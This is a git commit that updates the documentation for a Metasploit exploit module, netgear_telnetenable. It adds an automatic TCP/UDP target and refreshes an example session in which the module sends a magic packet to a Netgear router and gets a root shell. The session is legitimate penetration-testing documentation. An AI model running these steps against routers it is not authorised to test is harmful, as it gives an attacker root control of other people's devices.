Update doc for automatic targeting

GSoC/Meterpreter_Web_Console
William Vu 2018-03-02 06:22:48 -06:00
parent fba30d47a2
commit 4b29df7ab3
1 changed files with 10 additions and 5 deletions

View File

@ -21,11 +21,15 @@ A MAC address is required for exploitation. To determine the MAC address of the
## Targets
**0 (TCP)**
**0 (Automatic)**
Detect if a device listens on TCP or UDP.
**1 (TCP)**
Older devices usually listen on TCP.
**1 (UDP)**
**2 (UDP)**
Newer devices usually listen on UDP.
@ -72,11 +76,11 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.38 ms
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.40 ms
--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.381/1.381/1.381/0.000 ms
rtt min/avg/max/mdev = 1.408/1.408/1.408/0.000 ms
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1
@ -85,6 +89,7 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf5 exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled
[*] 192.168.1.1:23 - Sending magic packet
@ -98,6 +103,6 @@ id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #17 PREEMPT Thu Apr 25 10:00:48 CST 2013 armv7l unknown
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```